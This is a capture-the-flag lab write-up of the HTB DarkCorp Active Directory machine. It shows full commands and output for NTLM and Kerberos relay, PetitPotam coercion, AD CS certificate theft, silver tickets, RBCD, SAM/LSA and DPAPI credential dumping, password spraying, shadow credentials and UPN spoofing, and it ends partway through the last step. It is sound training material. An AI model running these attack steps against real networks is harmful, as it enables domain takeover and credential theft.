[*] Running in relay mode to single host
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled
[*] Servers started, waiting for connections
[*] (HTTP): Client requested path: /
[*] (HTTP): Client requested path: /
[*] (HTTP): Client requested path: /
[*] (HTTP): Connection from 10.10.14.86 controlled, attacking target ldap://172.16.20.1
[*] (HTTP): Client requested path: /
[*] (HTTP): Authenticating connection from DARKCORP/SVC_ACC@10.10.14.86 against ldap://172.16.20.1 SUCCEED [1]
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Assuming relayed user has privileges to escalate a user via ACL attack
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Checking if domain already has a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` DNS record
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Domain does not have a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` record!
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Adding `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` pointing to `10.10.14.86` at `DC=dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb`
[*] ldap://DARKCORP/SVC_ACC@172.16.20.1 [1] -> Added `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)
From the foothold on drip, confirm that the record resolves to our host:
ebelford@drip:~$ nslookup dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.darkcorp.htb
Server: 172.16.20.1
Address: 172.16.20.1#53
Name: dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.darkcorp.htb
Address: 10.10.14.86
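What the relayed LDAP add actually writes is a DNS_RPC_RECORD blob in the dnsRecord attribute of a new dnsNode object. The following is an added example, not code from this writeup, impacket or krbrelayx: it builds and decodes that blob (MS-DNSP 2.3.2.2, field order as in krbrelayx's dnstool.py), forms the relay name and the DN seen in the ntlmrelayx output above, and recognises the single NULL byte ntlmrelayx asks you to write back when cleaning up. The TTL and serial defaults are assumptions, not values from the page.

```python
import ipaddress
import struct

# Added example (not code from this writeup, impacket or krbrelayx): build and decode the
# DNS_RPC_RECORD blob that --add-dns-record stores in the dnsRecord attribute, and derive
# the relay name and dnsNode DN used above. TTL/serial defaults are assumptions.

DNS_TYPE_ZERO = 0        # type of a tombstoned record
DNS_TYPE_A = 1
RANK_ZONE = 0xF0         # authoritative data from the zone itself

# CredMarshalTargetInfo suffix as used on this page; treated as an opaque constant here.
MARSHALED_SUFFIX = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"


def relay_record_name(target_host: str) -> str:
    """Name of the A record the coerced client must resolve: target host + marshaled suffix."""
    name = f"{target_host}{MARSHALED_SUFFIX}"
    if len(name) > 63:   # one DNS label may not exceed 63 octets (RFC 1035)
        raise ValueError(f"label {name!r} is {len(name)} chars, DNS allows 63")
    return name


def dns_node_dn(name: str, zone: str, domain_dn: str) -> str:
    """DN of the dnsNode object for `name` in an AD-integrated zone in DomainDnsZones."""
    return f"DC={name},DC={zone},CN=MicrosoftDNS,DC=DomainDnsZones,{domain_dn}"


def build_a_record(ip: str, ttl: int = 180, serial: int = 1) -> bytes:
    """Serialise one DNS_RPC_RECORD holding an IPv4 A record."""
    data = ipaddress.IPv4Address(ip).packed
    # DataLength, Type, Version (always 5), Rank, Flags, Serial: all little-endian
    header = struct.pack("<HHBBHL", len(data), DNS_TYPE_A, 5, RANK_ZONE, 0, serial)
    # TtlSeconds is the one big-endian field; Reserved and TimeStamp are 0 for a static record
    return header + struct.pack(">L", ttl) + struct.pack("<LL", 0, 0) + data


def parse_dns_record(blob: bytes) -> dict:
    """Decode a dnsRecord value (for instance base64-decoded from an ldapsearch dump)."""
    if blob == b"\x00":
        # the value ntlmrelayx tells you to write back when cleaning up
        return {"type": DNS_TYPE_ZERO, "tombstoned": True}
    if len(blob) < 24:
        raise ValueError("truncated DNS_RPC_RECORD")
    data_len, rtype, version, rank, flags, serial = struct.unpack_from("<HHBBHL", blob, 0)
    (ttl,) = struct.unpack_from(">L", blob, 12)
    _reserved, timestamp = struct.unpack_from("<LL", blob, 16)
    data = blob[24:24 + data_len]
    if len(data) != data_len:
        raise ValueError("DataLength exceeds blob")
    rec = {"type": rtype, "version": version, "rank": rank, "flags": flags,
           "serial": serial, "ttl": ttl, "timestamp": timestamp}
    if rtype == DNS_TYPE_A:
        rec["address"] = str(ipaddress.IPv4Address(data))
    elif rtype == DNS_TYPE_ZERO:
        rec["tombstoned"] = True
    return rec


if __name__ == "__main__":
    name = relay_record_name("DC-01")
    print(dns_node_dn(name, "darkcorp.htb", "DC=darkcorp,DC=htb"))
    blob = build_a_record("10.10.14.86")
    print(blob.hex())
    print(parse_dns_record(blob))
```

Pull the attribute back with an LDAP search on the dnsNode DN after the relay to confirm the A record points at your host, and use the same parser on the value after cleanup to confirm the node is tombstoned rather than still live.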
1.8.3. kerberos relay
Next comes the Kerberos relay itself. Start krbrelayx first, pointing it at the certsrv endpoint on DC-01 with --adcs; -v 'WEB-01$' names the account whose authentication we expect to receive:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# uv run --with "impacket>=0.11.0" --with "pyOpenSSL==24.0.0" krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
krbrelayx relays the Kerberos authentication from WEB-01 to DC-01's web enrollment. With the listener up, check which coercion methods WEB-01 exposes and then use PetitPotam (authenticated with victor.r's ticket) to make it connect to our marshaled DNS name:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb WEB-01.darkcorp.htb -k --use-kcache -M coerce_plus
SMB WEB-01.darkcorp.htb 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:None)
SMB WEB-01.darkcorp.htb 445 WEB-01 [+] DARKCORP.HTB\victor.r from ccache
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, PetitPotam
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, PrinterBug
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, PrinterBug
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, MSEven
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb WEB-01.darkcorp.htb -k --use-kcache -M coerce_plus -o L=DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PetitPotam
SMB WEB-01.darkcorp.htb 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:None)
SMB WEB-01.darkcorp.htb 445 WEB-01 [+] DARKCORP.HTB\victor.r from ccache
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 VULNERABLE, PetitPotam
COERCE_PLUS WEB-01.darkcorp.htb 445 WEB-01 Exploit Success, efsrpc\EfsRpcAddUsersToFile
Kali's Python is 3.13 and ships a pyOpenSSL that is too new for krbrelayx, so writing the .pfx fails. Running krbrelayx through uv with pyOpenSSL pinned to 24.0.0 works around this:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# uv run --with "impacket>=0.11.0" --with "pyOpenSSL==24.0.0" krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
Installed 21 packages in 61ms
/root/Desktop/tools/krbrelayx/lib/servers/smbrelayserver.py:429: SyntaxWarning: invalid escape sequence '\%'
LOG.error("Authenticating against %s://%s as %s\%s FAILED" % (
/root/Desktop/tools/krbrelayx/lib/servers/smbrelayserver.py:441: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
/root/Desktop/tools/krbrelayx/lib/servers/smbrelayserver.py:516: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
/root/Desktop/tools/krbrelayx/lib/clients/__init__.py:17: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import os, sys, pkg_resources
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.232.7
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.129.232.7
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] HTTP server returned status code 200, treating as a successful login
[*] GOT CERTIFICATE! ID 7
[*] Writing PKCS#12 certificate to ./WEB-01.pfx
[*] Certificate successfully written to file
[*] Skipping user WEB-01$ since attack was already performed
Then use certipy to authenticate with the certificate, which yields a TGT and, via PKINIT's U2U trick, the NT hash of the machine account:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# certipy auth -pfx WEB-01.pfx -dc-ip 172.16.20.1
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'WEB-01.darkcorp.htb'
[*] Security Extension SID: 'S-1-5-21-3432610366-2163336488-3604236847-20601'
[*] Using principal: 'web-01$@darkcorp.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'web-01.ccache'
[*] Wrote credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[*] Got hash for 'web-01$@darkcorp.htb': aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675
With the NT hash of the machine account WEB-01$ we can obtain an Administrator service ticket for WEB-01 in two ways: forge a silver ticket with the machine key, or configure RBCD on the machine account for itself and go through S4U2self/S4U2proxy.
1.9. shell as web01's Administrator
1.9.1. Method 1: silver ticket
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-ticketer -nthash 8f33c7fc7ff515c1f358e488fbb8b675 -domain-sid S-1-5-21-3432610366-2163336488-3604236847 -domain darkcorp.htb -spn cifs/WEB-01.darkcorp.htb administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for darkcorp.htb/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb WEB-01.darkcorp.htb -k --use-kcache
SMB WEB-01.darkcorp.htb 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:None)
SMB WEB-01.darkcorp.htb 445 WEB-01 [+] DARKCORP.HTB\administrator from ccache (Pwn3d!)
1.9.2. Method 2: RBCD
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-rbcd -action write -delegate-from 'WEB-01$' -delegate-to 'WEB-01$' -dc-ip 172.16.20.1 darkcorp.htb/'WEB-01$' -hashes ':8f33c7fc7ff515c1f358e488fbb8b675'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] WEB-01$ can now impersonate users on WEB-01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] WEB-01$ (S-1-5-21-3432610366-2163336488-3604236847-20601)
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-getST -spn 'cifs/web-01.darkcorp.htb' -impersonate administrator 'darkcorp.htb/WEB-01$@DC-01.darkcorp.htb' -hashes :8f33c7fc7ff515c1f358e488fbb8b675
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_web-01.darkcorp.htb@DARKCORP.HTB.ccache
1.9.3. evil-winrm
Either ticket gives SMB admin on WEB-01. Dumping the SAM over that session (the secretsdump in 2.1.1 below) yields the local Administrator NT hash, which evil-winrm accepts with -H:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# evil-winrm -i WEB-01.darkcorp.htb -u administrator -H 88d84ec08dad123eb04a060a74053f21
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/5/2025 12:04 PM cleanup
d----- 1/16/2025 11:01 AM WindowsPowerShell
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../desktop/user.txt
a35e5767ab59b6582d20f21c9e30a1eb
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Finally, user.txt.
2. System
2.1. shell as john.w
2.1.1. secrets dump
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-secretsdump -k -no-pass WEB-01.darkcorp.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x4cf6d0e998d53752d088e233abb4bed6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d84ec08dad123eb04a060a74053f21:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
DARKCORP.HTB/svc_acc:$DCC2$10240#svc_acc#3a5485946a63220d3c4b118b36361dbb: (2026-01-19 04:38:06+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
darkcorp\WEB-01$:plain_password_hex:4100520044006c002600710072005a00640022007400230061003d004f00520063005e006b006e004f005d00270034004b0041003a003900390074006200320031006a0040005a004f004f005c004b003b00760075006600210063004f0075002f003c0072005d0043004c004a005800250075006c002d00440064005f006b00380038002c00270049002c0046004000680027003b004500200021003b0042004d005f0064003b0066002300700068005500440069002f0054002300320022005f004c0056004c003c0049006f002600480076002c005d00610034005500470077004a0076005f003400740054004800
darkcorp\WEB-01$:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1004cecdc9b33080d25a4a29126d4590eb555c5f
dpapi_userkey:0x7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
[*] NL$KM
0000 DD C9 21 14 B9 23 69 1B D8 BE FD 57 6B 3C 3E E1 ..!..#i....Wk<>.
0010 9D 3D 3F 74 82 AF 75 33 FD 74 61 6E B7 24 55 AF .=?t..u3.tan.$U.
0020 6F 61 A0 BC 2B 2A 86 CF 6E EC E0 D3 37 98 FE E5 oa..+*..n...7...
0030 14 54 7D A9 A6 45 19 37 F1 20 24 4B 18 43 19 72 .T}..E.7. $K.C.r
NL$KM:ddc92114b923691bd8befd576b3c3ee19d3d3f7482af7533fd74616eb72455af6f61a0bc2b2a86cf6eece0d33798fee514547da9a6451937f120244b18431972
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Now let's look at DPAPI.
2.1.2. DPAPI
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.2 -k --use-kcache --dpapi
SMB 172.16.20.2 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:None)
SMB 172.16.20.2 445 WEB-01 [+] DARKCORP.HTB\administrator from ccache (Pwn3d!)
SMB 172.16.20.2 445 WEB-01 [*] Collecting DPAPI masterkeys, grab a coffee and be patient...
SMB 172.16.20.2 445 WEB-01 [+] Got 6 decrypted masterkeys. Looting secrets...
SMB 172.16.20.2 445 WEB-01 [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6} - WEB-01\Administrator:But_Lying_Aid9!
The Task Scheduler credential holds the plaintext password of the local Administrator on WEB-01: But_Lying_Aid9!. Confirm it with local authentication:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.2 -u administrator -p 'But_Lying_Aid9!' --local-auth
SMB 172.16.20.2 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:WEB-01) (signing:False) (SMBv1:None)
SMB 172.16.20.2 445 WEB-01 [+] WEB-01\administrator:But_Lying_Aid9! (Pwn3d!)
2.1.3. Password spraying
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.1 -k --use-kcache --rid-brute
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] DARKCORP.HTB\web-01$ from ccache
SMB 172.16.20.1 445 DC-01 498: darkcorp\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 500: darkcorp\Administrator (SidTypeUser)
SMB 172.16.20.1 445 DC-01 501: darkcorp\Guest (SidTypeUser)
SMB 172.16.20.1 445 DC-01 502: darkcorp\krbtgt (SidTypeUser)
SMB 172.16.20.1 445 DC-01 512: darkcorp\Domain Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 513: darkcorp\Domain Users (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 514: darkcorp\Domain Guests (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 515: darkcorp\Domain Computers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 516: darkcorp\Domain Controllers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 517: darkcorp\Cert Publishers (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 518: darkcorp\Schema Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 519: darkcorp\Enterprise Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 520: darkcorp\Group Policy Creator Owners (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 521: darkcorp\Read-only Domain Controllers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 522: darkcorp\Cloneable Domain Controllers (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 525: darkcorp\Protected Users (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 526: darkcorp\Key Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 527: darkcorp\Enterprise Key Admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 553: darkcorp\RAS and IAS Servers (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 571: darkcorp\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 572: darkcorp\Denied RODC Password Replication Group (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 1000: darkcorp\DC-01$ (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1101: darkcorp\DnsAdmins (SidTypeAlias)
SMB 172.16.20.1 445 DC-01 1102: darkcorp\DnsUpdateProxy (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 1103: darkcorp\victor.r (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1104: darkcorp\svc_acc (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1105: darkcorp\john.w (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1106: darkcorp\angela.w (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1107: darkcorp\angela.w.adm (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1108: darkcorp\taylor.b (SidTypeUser)
SMB 172.16.20.1 445 DC-01 1109: darkcorp\linux_admins (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 1110: darkcorp\gpo_manager (SidTypeGroup)
SMB 172.16.20.1 445 DC-01 1601: darkcorp\DRIP$ (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.1 -u valid_user.txt -p But_Lying_Aid9!
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\Administrator:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\Guest:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\krbtgt:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\DC-01$:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\victor.r:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\svc_acc:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\john.w:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\angela.w:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\angela.w.adm:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\taylor.b:But_Lying_Aid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\DRIP$:But_Lying_Aid9! STATUS_LOGON_FAILURE
No domain account uses this password.
2.1.4. Decrypting the blob
With the local Administrator's plaintext password we can also decrypt his own DPAPI master key (from %APPDATA%\Microsoft\Protect\<SID>\) and the credential blob it protects (from %APPDATA%\Microsoft\Credentials\). The SID is the local machine SID with RID 500.
First the master key:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# impacket-dpapi masterkey -file 6037d071-cac5-481e-9e08-c4296c0a7ff7 -sid S-1-5-21-2988385993-1727309239-2541228647-500 -password 'But_Lying_Aid9!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 6037d071-cac5-481e-9e08-c4296c0a7ff7
Flags : 5 (5)
Policy : 0 (0)
MasterKeyLen: 000000b0 (176)
BackupKeyLen: 00000090 (144)
CredHistLen : 00000014 (20)
DomainKeyLen: 00000000 (0)
Decrypted key with User Key (SHA1)
Decrypted key: 0xac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da
Then the credential blob:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# impacket-dpapi credential -file 32B2774DF751FF7E28E78AE75C237A1E -key 0xac7861aa1f899a92f7d8895b96056a76c580515d8a4e71668bc29627f6e9f38ea289420db75c6f85daac34aba33048af683153b5cfe50dd9945a1be5ab1fe6da
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-16 19:01:39+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type : 0x00000001 (CRED_TYPE_GENERIC)
Target : LegacyGeneric:target=WEB-01
Description : Updated by: Administrator on: 1/16/2025
Unknown :
>>>> Username : Administrator
>>>> Unknown : Pack_Beneath_Solid9!
Another password: Pack_Beneath_Solid9!.
Spraying it across the domain users shows it is valid for john.w:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.1 -u valid_user.txt -p 'Pack_Beneath_Solid9!'
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\Administrator:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\Guest:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\krbtgt:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\DC-01$:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\victor.r:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [-] darkcorp.htb\svc_acc:Pack_Beneath_Solid9! STATUS_LOGON_FAILURE
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\john.w:Pack_Beneath_Solid9!
2.2. shell as ANGELA.W
BloodHound shows that john.w has GenericWrite over angela.w, and with AD CS in the domain the DC supports PKINIT, so Shadow Credentials (writing msDS-KeyCredentialLink) gives us angela.w's TGT and NT hash.
2.2.1. shadow credential
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# certipy shadow auto -k -no-pass -dc-ip '172.16.20.1' -target DC-01.darkcorp.htb -dc-host DC-01.darkcorp.htb -account 'angela.w'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting user 'angela.w'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '13b9bb7679344b2380e0785ed8938b32'
[*] Adding Key Credential with device ID '13b9bb7679344b2380e0785ed8938b32' to the Key Credentials for 'angela.w'
[*] Successfully added Key Credential with device ID '13b9bb7679344b2380e0785ed8938b32' to the Key Credentials for 'angela.w'
[*] Authenticating as 'angela.w' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'angela.w@darkcorp.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'angela.w.ccache'
[*] Wrote credential cache to 'angela.w.ccache'
[*] Trying to retrieve NT hash for 'angela.w'
[*] Restoring the old Key Credentials for 'angela.w'
[*] Successfully restored the old Key Credentials for 'angela.w'
[*] NT hash for 'angela.w': 957246c8137069bca672dc6aa0af7c7a
2.3. shell as Linux root
angela.w's outbound control yields nothing useful.
angela.w.adm, however, is a member of linux_admins, the group that SSSD allows onto the Linux host (simple_allow_groups, see the sssd.conf further down).
Getting that account is very likely the next step.
2.3.1. UPN Spoofing
0xdf's writeup points to UPN spoofing here; the technique is described in the Pen Test Partners post "A broken marriage: abusing mixed vendor Kerberos stacks":
https://www.pentestpartners.com/security-blog/a-broken-marriage-abusing-mixed-vendor-kerberos-stacks/
First, using john.w's GenericWrite, set angela.w's userPrincipalName to angela.w.adm:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# bloodyAD -u john.w -k --dc-ip 172.16.20.1 --host DC-01.darkcorp.htb -d darkcorp.htb set object angela.w userPrincipalName -v angela.w.adm
[+] angela.w's userPrincipalName has been updated
Then request a TGT with the NT_ENTERPRISE name type. The KDC resolves an enterprise principal by userPrincipalName rather than sAMAccountName, so angela.w's NT hash authenticates a ticket whose client name is angela.w.adm:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/dpapi]
└─# impacket-getTGT -hashes :957246c8137069bca672dc6aa0af7c7a -principalType 'NT_ENTERPRISE' darkcorp.htb/angela.w.adm
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in angela.w.adm.ccache
Copy this ccache to the Linux host and use ksu to switch to angela.w.adm; MIT Kerberos maps the principal angela.w.adm@DARKCORP.HTB onto the SSSD-provided local account of the same name:
